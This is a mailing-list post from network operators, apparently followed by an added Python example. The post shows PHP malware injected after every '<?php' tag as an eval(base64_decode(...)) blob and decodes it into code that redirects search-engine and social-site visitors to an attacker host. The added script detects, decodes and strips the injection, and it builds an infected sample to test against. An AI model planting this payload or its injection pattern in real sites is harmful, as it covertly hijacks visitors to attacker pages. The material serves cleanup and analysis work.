[154191] in North American Network Operators' Group


Re: No DNS poisoning at Google (in case of trouble, blame the DNS)

daemon@ATHENA.MIT.EDU (Ryan Rawdon)
Wed Jun 27 10:12:39 2012

From: Ryan Rawdon <ryan@u13.net>
In-Reply-To: <20120627132604.GA74019@DataIX.net>
Date: Wed, 27 Jun 2012 10:10:04 -0400
To: Jason Hellenthal <jhellenthal@dataix.net>
Cc: "nanog@nanog.org" <nanog@nanog.org>,
 Arturo Servin <arturo.servin@gmail.com>
Errors-To: nanog-bounces+nanog.discuss=bloom-picayune.mit.edu@nanog.org



On Jun 27, 2012, at 9:26 AM, Jason Hellenthal wrote:

>
> What would be nice is the to see the contents of the htaccess file
> (obviously with sensitive information excluded)


I cleaned up compromises similar to this in a customer site fairly recently.  In our case it was the same exact behavior but was PHP injected into their application, instead of .htaccess.  I do not recall what the original compromise vector was; it was something in the customer's custom application which they resolved.

It looked like the malware did a find and replace for <?php and replaced it with:

<?php eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vYnJ1Z2dlLm9zYS5wbC8iKTsNCmV4aXQoKTsNCn0NCn0NCn0NCn0="));


Which decoded yields:
error_reporting(0);                          // hide any warnings the injected code causes
$qazplm=headers_sent();
if (!$qazplm){                               // only act if a Location header can still be sent
  $referer=$_SERVER['HTTP_REFERER'];
  $uag=$_SERVER['HTTP_USER_AGENT'];
  if ($uag) {                                // ignore clients that send no User-Agent
    // fire only for visitors arriving from search engines, social sites and URL shorteners
    if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com") or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
      // with "or" this is true unless the referer contains both "cache" and "inurl"
      if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
        header("Location: http://brugge.osa.pl/");
        exit();
      }
    }
  }
}

(where brugge.osa.pl was the destination for the redirects in the compromise of this customer site)



>
> On Wed, Jun 27, 2012 at 10:14:12AM -0300, Arturo Servin wrote:
>>
>>> <snip>
>>
>
> --
>
> - (2^(N-1))
>
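The cleanup Ryan describes is a find-and-replace in reverse: locate every "<?php" that has grown an eval(base64_decode("...")) behind it, decode the blob to see what it does, and cut the insertion out. The script below is an added example, not code from the thread or from any project. It scans PHP source for that pattern, extracts the redirect target and the referer strings the payload keys on, and strips the injection so the original opening tag survives. The sample file contents, the abridged payload (a few of the referer checks from the decoded code above, re-encoded the same way) and the helper names are all constructed for the example.

```python
import base64
import os
import re

# Marker for the injection the mail describes: "<?php" replaced by
# '<?php eval(base64_decode("..."));'. Group 1 is the base64 blob; the
# surrounding whitespace and trailing ";" are matched so clean() can cut
# the whole insertion out and leave the original "<?php" intact.
INJECT = re.compile(
    r'\s*eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=\s]+)["\']\s*\)\s*\)\s*;?',
    re.IGNORECASE,
)
# Details worth pulling out of a decoded payload for triage.
LOCATION = re.compile(r'header\s*\(\s*["\']Location:\s*([^"\']+)["\']', re.IGNORECASE)
STRISTR = re.compile(r'stristr\s*\(\s*\$\w+\s*,\s*["\']([^"\']+)["\']', re.IGNORECASE)


def find_eval_payloads(php_source):
    """Decode every eval(base64_decode("...")) blob found in php_source."""
    payloads = []
    for m in INJECT.finditer(php_source):
        blob = re.sub(r"\s+", "", m.group(1))
        try:
            payloads.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except ValueError:
            # Not valid base64: still an eval() of a blob, so report it raw.
            payloads.append(blob)
    return payloads


def analyze(php_source):
    """Summarise each injected payload: where it redirects and what it keys on."""
    findings = []
    for payload in find_eval_payloads(php_source):
        findings.append({
            "redirects_to": LOCATION.findall(payload),
            "referer_strings": sorted(set(STRISTR.findall(payload))),
            "suppresses_errors": "error_reporting(0)" in payload,
        })
    return findings


def clean(php_source):
    """Remove the injected eval() calls, leaving the original '<?php' tag."""
    return INJECT.sub("", php_source)


def scan_tree(root):
    """Walk a webroot and return {path: findings} for every infected PHP file."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".php", ".inc", ".phtml")):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings = analyze(fh.read())
                if findings:
                    hits[path] = findings
    return hits


# Constructed sample (not from the thread): the redirect logic quoted in the
# mail, abridged to three referer checks, re-encoded and injected right after
# "<?php" the way the mail describes.
_PAYLOAD_PHP = """
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (stristr($referer,"yahoo") or stristr($referer,"bing") or preg_match("/google\\.(.*?)\\/url/",$referer)) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://brugge.osa.pl/");
exit();
}
}
}
}"""
SAMPLE_CLEAN = "<?php\nfunction hello() { return 'hi'; }\n"
SAMPLE_INFECTED = SAMPLE_CLEAN.replace(
    "<?php",
    '<?php\t \teval(base64_decode("%s"));' % base64.b64encode(_PAYLOAD_PHP.encode()).decode(),
    1,
)

if __name__ == "__main__":
    for f in analyze(SAMPLE_INFECTED):
        print("redirects to:", f["redirects_to"], "keyed on:", f["referer_strings"])
    assert clean(SAMPLE_INFECTED) == SAMPLE_CLEAN
```

Run scan_tree() against a copy of the webroot and review each decoded payload before applying clean(); the regex only recognises this one wrapper, so a payload that decodes to a second stage (another eval, gzinflate, a file include) needs to be chased by hand. Because the decoded code only redirects when a User-Agent is present and the Referer matches one of its strings, a direct visit by the site owner never triggers it; to confirm the live behaviour, request the page with those headers set, e.g. curl -I -A 'Mozilla/5.0' -e 'https://www.google.com/url?q=x' https://example.invalid/ and look for a 302 to the attacker's host.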


